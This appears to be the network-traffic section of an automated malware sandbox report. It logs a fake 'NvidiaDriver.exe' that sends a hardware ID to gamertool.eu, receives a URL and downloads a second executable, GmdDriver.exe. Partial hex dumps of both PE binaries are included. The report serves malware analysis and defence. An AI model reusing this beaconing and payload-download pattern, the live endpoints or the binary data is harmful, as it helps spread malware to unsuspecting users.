                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Host: gamertool.eu
                                                                                                                                          2024-12-08 17:06:38 UTC932INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:38 GMT
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Content-Length: 25600
                                                                                                                                          Connection: close
                                                                                                                                          Last-Modified: Thu, 05 Dec 2024 14:31:36 GMT
                                                                                                                                          ETag: "6751b948-6400"
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Cache-Control: max-age=120
                                                                                                                                          CF-Cache-Status: REVALIDATED
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zBpxVc3LL24AWKuQpgZOMupKhwGpULLgWY7uVYDDfuhDMVCXdD8JNUtLxLdmsVUSLkSPBnIjNLM%2BFxZ%2F0pCwL3SYn1LMnAkx9KT2en2tJr3De80vt8wNFdgdhU7XcAc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee58dcb81e422e-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1712&rtt_var=669&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=809&delivery_rate=1602634&cwnd=252&unsent_bytes=0&cid=d3062e71cb7e43ff&ts=737&x=0"
                                                                                                                                          2024-12-08 17:06:38 UTC437INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c b9 bf 90 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 5a 00 00 00 08 00 00 00 00 00 00 da 79 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL\"0Zy @ `
                                                                                                                                          2024-12-08 17:06:38 UTC1369INData Raw: 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ba 79 00 00 00 00 00 00 48 00 00 00 02 00 05 00 10 47 00 00 f4 31 00 00 03 00 02 00 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 37 00 00 00 01 00 00 11 12 00 28 18 00 00 0a 7d 0f 00 00 04 12 00 02 7d 10 00 00 04 12 00 15 7d 0e 00 00 04 12 00 7c 0f 00 00 04 12 00 28 01 00 00 2b 12 00 7c 0f 00 00 04 28 1a 00 00 0a 2a 00 13 30 02 00 37 00 00 00 02 00 00 11 12 00 28 18 00 00 0a 7d 1a 00 00 04 12 00 02 7d 1b 00 00 04
                                                                                                                                          Data Ascii: \@@.relocb@ByHG107(}}}|(+|(*07(}}
                                                                                                                                          2024-12-08 17:06:38 UTC1369INData Raw: 0a 00 00 04 2a 1e 02 28 1b 00 00 0a 2a 66 02 7b 0b 00 00 04 73 30 00 00 0a 25 17 6f 31 00 00 0a 28 32 00 00 0a 26 2a 1e 02 28 1b 00 00 0a 2a 66 02 7b 0c 00 00 04 73 30 00 00 0a 25 17 6f 31 00 00 0a 28 32 00 00 0a 26 2a 92 02 7b 0d 00 00 04 73 30 00 00 0a 25 17 6f 31 00 00 0a 25 7e 01 00 00 04 6f 33 00 00 0a 28 32 00 00 0a 26 2a 1b 30 03 00 17 01 00 00 10 00 00 11 02 7b 0e 00 00 04 0a 06 2c 55 06 17 3b b6 00 00 00 02 7b 10 00 00 04 7e 01 00 00 04 28 11 00 00 2b 2c 61 7e 06 00 00 04 28 02 00 00 06 6f 20 00 00 0a 0b 12 01 28 35 00 00 0a 2d 3f 02 16 25 0a 7d 0e 00 00 04 02 07 7d 11 00 00 04 02 7c 0f 00 00 04 12 01 02 28 12 00 00 2b dd b7 00 00 00 02 7b 11 00 00 04 0b 02 7c 11 00 00 04 fe 15 14 00 00 01 02 15 25 0a 7d 0e 00 00 04 12 01 28 21 00 00 0a 2b 66 7e
                                                                                                                                          Data Ascii: *(*f{s0%o1(2&*(*f{s0%o1(2&*{s0%o1%~o3(2&*0{,U;{~(+,a~(o (5-?%}}|(+{|%}(!+f~
                                                                                                                                          2024-12-08 17:06:38 UTC1369INData Raw: 00 00 04 02 7c 13 00 00 04 12 04 02 28 13 00 00 2b dd f3 00 00 00 02 7b 18 00 00 04 13 04 02 7c 18 00 00 04 fe 15 14 00 00 01 02 15 25 0a 7d 12 00 00 04 12 04 28 21 00 00 0a 19 8d 13 00 00 01 25 16 28 10 00 00 06 a2 25 17 02 7b 17 00 00 04 7b 0d 00 00 04 28 07 00 00 06 a2 25 18 02 7b 17 00 00 04 7b 0c 00 00 04 7e 01 00 00 04 28 0d 00 00 06 a2 28 44 00 00 0a 6f 20 00 00 0a 13 04 12 04 28 35 00 00 0a 2d 3e 02 1c 25 0a 7d 12 00 00 04 02 11 04 7d 18 00 00 04 02 7c 13 00 00 04 12 04 02 28 13 00 00 2b de 60 02 7b 18 00 00 04 13 04 02 7c 18 00 00 04 fe 15 14 00 00 01 02 15 25 0a 7d 12 00 00 04 12 04 28 21 00 00 0a de 20 13 05 02 1f fe 7d 12 00 00 04 02 14 7d 17 00 00 04 02 7c 13 00 00 04 11 05 28 37 00 00 0a de 1a 02 1f fe 7d 12 00 00 04 02 14 7d 17 00 00 04 02
                                                                                                                                          Data Ascii: |(+{|%}(!%(%{{(%{{~((Do (5->%}}|(+`{|%}(! }}|(7}}
                                                                                                                                          2024-12-08 17:06:38 UTC1369INData Raw: 00 0a 2a 00 1b 30 05 00 d8 00 00 00 15 00 00 11 02 7b 2c 00 00 04 0a 06 2c 7e 73 31 00 00 06 25 02 7b 2e 00 00 04 7d 20 00 00 04 25 02 7b 2f 00 00 04 7d 21 00 00 04 25 72 59 01 00 70 28 58 00 00 0a 0b 12 01 72 a3 01 00 70 28 59 00 00 0a 28 5a 00 00 0a 7d 22 00 00 04 fe 06 32 00 00 06 73 41 00 00 0a 28 42 00 00 0a 6f 20 00 00 0a 0c 12 02 28 35 00 00 0a 2d 3c 02 16 25 0a 7d 2c 00 00 04 02 08 7d 30 00 00 04 02 7c 2d 00 00 04 12 02 02 28 15 00 00 2b de 4f 02 7b 30 00 00 04 0c 02 7c 30 00 00 04 fe 15 14 00 00 01 02 15 25 0a 7d 2c 00 00 04 12 02 28 21 00 00 0a de 17 0d 02 1f fe 7d 2c 00 00 04 02 7c 2d 00 00 04 09 28 37 00 00 0a de 13 02 1f fe 7d 2c 00 00 04 02 7c 2d 00 00 04 28 38 00 00 0a 2a 01 10 00 00 00 00 07 00 a6 ad 00 17 18 00 00 01 36 02 7c 2d 00 00 04
                                                                                                                                          Data Ascii: *0{,,~s1%{.} %{/}!%rYp(Xrp(Y(Z}"2sA(Bo (5-<%},}0|-(+O{0|0%},(!},|-(7},|-(8*6|-
                                                                                                                                          2024-12-08 17:06:38 UTC1369INData Raw: 0a 2a 00 41 1c 00 00 00 00 00 00 07 00 00 00 d5 02 00 00 dc 02 00 00 20 00 00 00 18 00 00 01 36 02 7c 37 00 00 04 03 28 39 00 00 0a 2a 00 00 1b 30 03 00 53 01 00 00 10 00 00 11 02 7b 3f 00 00 04 0a 06 17 36 1c 02 73 2d 00 00 06 7d 42 00 00 04 02 7b 42 00 00 04 02 7b 41 00 00 04 7d 1e 00 00 04 00 06 2c 66 06 17 3b bb 00 00 00 02 7b 42 00 00 04 7b 1e 00 00 04 28 45 00 00 0a 28 0a 00 00 06 2d 6b 02 7b 42 00 00 04 fe 06 2e 00 00 06 73 41 00 00 0a 28 42 00 00 0a 6f 20 00 00 0a 0b 12 01 28 35 00 00 0a 2d 3f 02 16 25 0a 7d 3f 00 00 04 02 07 7d 43 00 00 04 02 7c 40 00 00 04 12 01 02 28 1a 00 00 2b dd c1 00 00 00 02 7b 43 00 00 04 0b 02 7c 43 00 00 04 fe 15 14 00 00 01 02 15 25 0a 7d 3f 00 00 04 12 01 28 21 00 00 0a 20 e8 03 00 00 28 46 00 00 0a 6f 20 00 00 0a 0b
                                                                                                                                          Data Ascii: *A 6|7(9*0S{?6s-}B{B{A},f;{B{(E(-k{B.sA(Bo (5-?%}?}C|@(+{C|C%}?(! (Fo
                                                                                                                                          2024-12-08 17:06:38 UTC1369INData Raw: 70 28 5a 00 00 0a 07 6f 70 00 00 0a 6f 71 00 00 0a 0d 12 03 28 72 00 00 0a 2d 3f 02 16 25 0a 7d 4f 00 00 04 02 09 7d 52 00 00 04 02 7c 50 00 00 04 12 03 02 28 1d 00 00 2b dd 9a 02 00 00 02 7b 52 00 00 04 0d 02 7c 52 00 00 04 fe 15 0a 00 00 1b 02 15 25 0a 7d 4f 00 00 04 12 03 28 73 00 00 0a 0c 08 6f 74 00 00 0a 39 3d 02 00 00 08 6f 75 00 00 0a 6f 76 00 00 0a 6f 77 00 00 0a 13 05 12 05 28 78 00 00 0a 2d 41 02 17 25 0a 7d 4f 00 00 04 02 11 05 7d 53 00 00 04 02 7c 50 00 00 04 12 05 02 28 1e 00 00 2b dd 2c 02 00 00 02 7b 53 00 00 04 13 05 02 7c 53 00 00 04 fe 15 0c 00 00 1b 02 15 25 0a 7d 4f 00 00 04 12 05 28 79 00 00 0a 13 04 11 04 28 4c 00 00 0a 3a cc 01 00 00 02 73 49 00 00 06 7d 51 00 00 04 02 7b 51 00 00 04 28 7a 00 00 0a 6f 7b 00 00 0a 11 04 28 45 00 00
                                                                                                                                          Data Ascii: p(Zopoq(r-?%}O}R|P(+{R|R%}O(sot9=ouovow(x-A%}O}S|P(+,{S|S%}O(y(L:sI}Q{Q(zo{(E
                                                                                                                                          2024-12-08 17:06:38 UTC1369INData Raw: 11 07 28 4c 00 00 0a 3a 08 02 00 00 02 73 4b 00 00 06 7d 58 00 00 04 02 7b 58 00 00 04 17 8d 3b 00 00 01 25 16 28 1c 00 00 0a 72 5b 00 00 70 28 58 00 00 0a 13 08 12 08 72 a3 01 00 70 28 59 00 00 0a 11 07 28 81 00 00 0a 28 5a 00 00 0a 28 82 00 00 0a a2 28 83 00 00 0a 7d 4d 00 00 04 00 06 1a 59 45 03 00 00 00 40 00 00 00 87 00 00 00 71 01 00 00 7e 08 00 00 04 11 07 6f 7c 00 00 0a 6f 71 00 00 0a 13 05 12 05 28 72 00 00 0a 2d 41 02 1a 25 0a 7d 56 00 00 04 02 11 05 7d 5a 00 00 04 02 7c 57 00 00 04 12 05 02 28 21 00 00 2b dd b7 01 00 00 02 7b 5a 00 00 04 13 05 02 7c 5a 00 00 04 fe 15 0a 00 00 1b 02 15 25 0a 7d 56 00 00 04 12 05 28 73 00 00 0a 13 09 11 09 6f 7d 00 00 0a 26 02 02 7b 58 00 00 04 7b 4d 00 00 04 18 18 16 73 7e 00 00 0a 7d 5d 00 00 04 00 06 1b 2e 46
                                                                                                                                          Data Ascii: (L:sK}X{X;%(r[p(Xrp(Y((Z((}MYE@q~o|oq(r-A%}V}Z|W(!+{Z|Z%}V(so}&{X{Ms~}].F
                                                                                                                                          2024-12-08 17:06:38 UTC1369INData Raw: 0a 2a 00 00 1b 30 03 00 ad 01 00 00 10 00 00 11 02 7b 67 00 00 04 0a 06 45 04 00 00 00 37 00 00 00 91 00 00 00 eb 00 00 00 50 01 00 00 28 13 00 00 06 6f 20 00 00 0a 0b 12 01 28 35 00 00 0a 2d 3f 02 16 25 0a 7d 67 00 00 04 02 07 7d 69 00 00 04 02 7c 68 00 00 04 12 01 02 28 27 00 00 2b dd 58 01 00 00 02 7b 69 00 00 04 0b 02 7c 69 00 00 04 fe 15 14 00 00 01 02 15 25 0a 7d 67 00 00 04 12 01 28 21 00 00 0a 28 12 00 00 06 6f 20 00 00 0a 0b 12 01 28 35 00 00 0a 2d 3f 02 17 25 0a 7d 67 00 00 04 02 07 7d 69 00 00 04 02 7c 68 00 00 04 12 01 02 28 27 00 00 2b dd fe 00 00 00 02 7b 69 00 00 04 0b 02 7c 69 00 00 04 fe 15 14 00 00 01 02 15 25 0a 7d 67 00 00 04 12 01 28 21 00 00 0a 28 11 00 00 06 6f 20 00 00 0a 0b 12 01 28 35 00 00 0a 2d 3f 02 18 25 0a 7d 67 00 00 04 02
                                                                                                                                          Data Ascii: *0{gE7P(o (5-?%}g}i|h('+X{i|i%}g(!(o (5-?%}g}i|h('+{i|i%}g(!(o (5-?%}g
                                                                                                                                          2024-12-08 17:06:38 UTC1369INData Raw: 00 27 00 03 01 10 00 b5 04 00 00 59 00 12 00 29 00 03 01 10 00 9a 04 00 00 59 00 19 00 2b 00 03 01 10 00 01 00 00 00 41 00 1e 00 2d 00 03 01 10 00 16 00 00 00 41 00 1f 00 2f 00 03 01 10 00 2b 00 00 00 41 00 20 00 31 00 03 01 10 00 40 00 00 00 41 00 23 00 33 00 03 01 10 00 55 00 00 00 41 00 26 00 35 00 03 01 10 00 d7 01 00 00 41 00 2b 00 39 00 03 01 10 00 a9 03 00 00 59 00 2c 00 3b 00 03 01 10 00 ee 03 00 00 59 00 31 00 3d 00 03 01 10 00 5e 04 00 00 59 00 36 00 3f 00 03 01 10 00 9d 01 00 00 59 00 3f 00 41 00 03 01 10 00 30 04 00 00 59 00 44 00 43 00 03 21 10 00 10 05 00 00 41 00 49 00 45 00 03 01 10 00 2b 00 00 00 41 00 4c 00 49 00 03 01 10 00 40 00 00 00 41 00 4d 00 4b 00 03 01 10 00 6a 00 00 00 41 00 4e 00 4d 00 03 01 10 00 8f 03 00 00 59 00 4f 00 4f 00
                                                                                                                                          Data Ascii: 'Y)Y+A-A/+A 1@A#3UA&5A+9Y,;Y1=^Y6?Y?A0YDC!AIE+ALI@AMKjANMYOO


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.449855104.21.9.1684436940C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:41 UTC165OUTPOST /receive.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: gamertool.eu
                                                                                                                                          Content-Length: 69
                                                                                                                                          Expect: 100-continue
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-12-08 17:06:42 UTC69OUTData Raw: 68 77 69 64 3d 33 66 63 35 39 39 32 63 63 61 61 62 31 36 32 64 64 34 33 32 38 37 32 33 38 64 61 34 61 33 31 36 63 30 36 66 33 63 66 61 37 37 37 35 66 34 37 65 64 32 66 33 61 39 66 30 63 38 61 30 35 66 34 32
                                                                                                                                          Data Ascii: hwid=3fc5992ccaab162dd43287238da4a316c06f3cfa7775f47ed2f3a9f0c8a05f42
                                                                                                                                          2024-12-08 17:06:42 UTC25INHTTP/1.1 100 Continue
                                                                                                                                          2024-12-08 17:06:42 UTC845INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:42 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ThtPw9Ckbpq3v4iz1IjxSHkZhdM8X0uwFFGxWX7gns5laB9BE8eZqoyugkKzat0WELW%2BZBvodzRzGqHF3MrOJEOdQL06YO3vzS2DXX%2B1zYm8X73iCwSfHlYB91POGTE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee58f5dd6342ec-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4202&min_rtt=2076&rtt_var=4833&sent=7&recv=10&lost=0&retrans=0&sent_bytes=3325&recv_bytes=870&delivery_rate=1370248&cwnd=184&unsent_bytes=0&cid=567f91c95cebaf54&ts=1071&x=0"
                                                                                                                                          0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.449861104.21.9.1684436940C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:44 UTC142OUTPOST /get_file.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: gamertool.eu
                                                                                                                                          Content-Length: 69
                                                                                                                                          Expect: 100-continue
                                                                                                                                          2024-12-08 17:06:44 UTC69OUTData Raw: 68 77 69 64 3d 33 66 63 35 39 39 32 63 63 61 61 62 31 36 32 64 64 34 33 32 38 37 32 33 38 64 61 34 61 33 31 36 63 30 36 66 33 63 66 61 37 37 37 35 66 34 37 65 64 32 66 33 61 39 66 30 63 38 61 30 35 66 34 32
                                                                                                                                          Data Ascii: hwid=3fc5992ccaab162dd43287238da4a316c06f3cfa7775f47ed2f3a9f0c8a05f42
                                                                                                                                          2024-12-08 17:06:44 UTC25INHTTP/1.1 100 Continue
                                                                                                                                          2024-12-08 17:06:45 UTC882INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:45 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FsZA9BjVpmzGNTN2lP7WoyGjekNKNjg49FUsTMHKFgXfTXOFON2Kqurs8dikV8%2FWMU%2Bi5yAwR2QjD8RmlrfHWajYpuizxu9yJEvsjeLb6326xKOQECHq6XPHphhOVGY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee590448e28c6c-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8049&min_rtt=1804&rtt_var=12997&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3325&recv_bytes=871&delivery_rate=1586956&cwnd=169&unsent_bytes=0&cid=5e2ce61cd3679d7c&ts=1058&x=0"
                                                                                                                                          22
                                                                                                                                          https://gamertool.eu/GmdDriver.exe
                                                                                                                                          2024-12-08 17:06:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.449868104.21.9.1684436940C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:46 UTC51OUTGET /GmdDriver.exe HTTP/1.1
                                                                                                                                          Host: gamertool.eu
                                                                                                                                          2024-12-08 17:06:47 UTC949INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:47 GMT
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Content-Length: 1461248
                                                                                                                                          Connection: close
                                                                                                                                          Last-Modified: Fri, 06 Dec 2024 22:51:36 GMT
                                                                                                                                          ETag: "67537ff8-164c00"
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Cache-Control: max-age=120
                                                                                                                                          CF-Cache-Status: REVALIDATED
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2B7r3LxfmWaEwYYKOk0m%2BLuv2T3FacAfYEbSLyN2E6E800umDzy%2F6cn%2FFWKbKLpvMGHuBpO3%2B1wG0LZV7mfPOvGYecUqamsTUvsUBXkqS6%2Fl6Hlpy5z8Zcmk5xKr%2F1Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee5912cf968c41-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11549&min_rtt=1846&rtt_var=6612&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=689&delivery_rate=1581798&cwnd=225&unsent_bytes=0&cid=5b36510808a9530d&ts=1104&x=0"
                                                                                                                                          2024-12-08 17:06:47 UTC420INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 00 00 00 00 00 22 0a 00 3c 4e 00 00 e0 00 06 01 0b 01 02 28 00 40 08 00 00 46 16 00 00 0c 00 00 07 13 00 00 00 10 00 00 00 50 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 17 00 00 06 00 00 4a 4c 19 00 03 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"<N(@FP@JL@
                                                                                                                                          2024-12-08 17:06:47 UTC1369INData Raw: 61 00 00 00 ac 1c 00 00 00 50 08 00 00 1e 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 cc b2 00 00 00 70 08 00 00 b4 00 00 00 64 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 d4 0a 00 00 00 30 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 30 10 00 00 00 40 09 00 00 12 00 00 00 18 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 34 00 00 00 00 60 09 00 00 02 00 00 00 2a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 09 00 00 02 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ac 29 0c 00 00 80 09 00 00 2a 0c
                                                                                                                                          Data Ascii: aPF@.rdatapd@@.bss0.idata0@@.CRT4`*@.tlsp,@.rsrc)*
                                                                                                                                          2024-12-08 17:06:47 UTC1369INData Raw: 24 08 14 30 49 00 89 44 24 0c c7 44 24 04 18 30 49 00 c7 04 24 1c 30 49 00 e8 1d d7 00 00 c9 c3 8d 4c 24 04 83 e4 f0 ff 71 fc 55 89 e5 57 56 53 51 83 ec 28 64 a1 18 00 00 00 8b 58 04 31 c0 f0 0f b1 1d 30 30 49 00 74 14 39 c3 74 14 c7 04 24 e8 03 00 00 ff 15 88 43 49 00 57 eb e0 31 db eb 05 bb 01 00 00 00 a1 34 30 49 00 48 75 0e c7 04 24 1f 00 00 00 e8 e9 d6 00 00 eb 33 a1 34 30 49 00 85 c0 75 20 c7 05 34 30 49 00 01 00 00 00 c7 44 24 04 14 60 49 00 c7 04 24 0c 60 49 00 e8 e8 d6 00 00 eb 0a c7 05 08 30 49 00 01 00 00 00 a1 34 30 49 00 48 75 1e c7 44 24 04 08 60 49 00 c7 04 24 00 60 49 00 e8 c0 d6 00 00 c7 05 34 30 49 00 02 00 00 00 85 db 75 06 87 1d 30 30 49 00 a1 28 ac 48 00 85 c0 74 18 31 db 31 f6 c7 44 24 04 02 00 00 00 89 5c 24 08 89 34 24 ff d0 83 ec
                                                                                                                                          Data Ascii: $0ID$D$0I$0IL$qUWVSQ(dX100It9t$CIW140IHu$340Iu 40ID$`I$`I0I40IHuD$`I$`I40Iu00I(Ht11D$\$4$
                                                                                                                                          2024-12-08 17:06:47 UTC1369INData Raw: ff 89 44 24 04 8d 85 bc fe ff ff 89 04 24 e8 07 d7 07 00 8b 10 83 ea 0c 8b 12 01 d0 89 c1 e8 af fd 03 00 84 c0 74 07 b8 01 00 00 00 eb 05 b8 00 00 00 00 84 c0 0f 85 ef fe ff ff c7 04 24 0a 71 48 00 c7 85 58 fe ff ff 03 00 00 00 e8 cd 3f 01 00 8d 85 8c fe ff ff 89 c1 e8 e4 df 06 00 8d 85 a4 fe ff ff 89 c1 e8 d7 df 06 00 8d 85 bc fe ff ff 89 c1 e8 9e 4b 07 00 8d 45 88 89 c1 e8 c0 df 06 00 8d 45 a4 89 c1 e8 aa 5b 01 00 e9 d3 00 00 00 8b 95 5c fe ff ff 8b 85 58 fe ff ff 85 c0 74 13 83 e8 01 85 c0 74 7e 83 e8 01 85 c0 74 24 83 e8 01 0f 0b 89 95 50 fe ff ff 8d 45 db 89 c1 e8 ea 3c 06 00 90 8b 85 50 fe ff ff 89 85 50 fe ff ff eb 6f 89 95 50 fe ff ff 8d 85 8c fe ff ff 89 c1 e8 5c df 06 00 8b 85 50 fe ff ff 89 85 50 fe ff ff 8d 85 a4 fe ff ff 89 c1 e8 43 df 06 00
                                                                                                                                          Data Ascii: D$$t$qHX?KEE[\Xtt~t$PE<PPoP\PPC
                                                                                                                                          2024-12-08 17:06:47 UTC1369INData Raw: 89 55 d8 83 7d d8 00 0f 84 d0 00 00 00 a1 28 30 49 00 8b 40 3c 89 c2 a1 28 30 49 00 01 d0 8b 80 a4 00 00 00 85 c0 0f 84 b1 00 00 00 a1 28 30 49 00 8b 40 3c 89 c2 a1 28 30 49 00 01 d0 8b 90 a0 00 00 00 8b 45 dc 01 d0 89 45 f0 e9 80 00 00 00 8b 45 f0 83 c0 08 89 45 d4 c7 45 ec 00 00 00 00 eb 50 8b 45 ec 8d 14 00 8b 45 d4 01 d0 0f b7 00 66 c1 e8 0c 66 83 f8 03 75 34 8b 45 f0 8b 10 8b 45 dc 01 c2 8b 45 ec 8d 0c 00 8b 45 d4 01 c8 0f b7 00 0f b7 c0 25 ff 0f 00 00 01 d0 89 45 d0 8b 45 d0 8b 10 8b 45 d8 01 c2 8b 45 d0 89 10 83 45 ec 01 8b 45 f0 8b 40 04 83 e8 08 d1 e8 39 45 ec 72 a0 8b 45 f0 8b 50 04 8b 45 f0 01 d0 89 45 f0 8b 45 f0 8b 00 85 c0 0f 85 73 ff ff ff a1 28 30 49 00 8b 40 3c 89 c2 a1 28 30 49 00 01 d0 8b 80 84 00 00 00 85 c0 0f 84 7e 01 00 00 a1 28 30
                                                                                                                                          Data Ascii: U}(0I@<(0I(0I@<(0IEEEEEPEEffu4EEEE%EEEEEE@9ErEPEEEs(0I@<(0I~(0
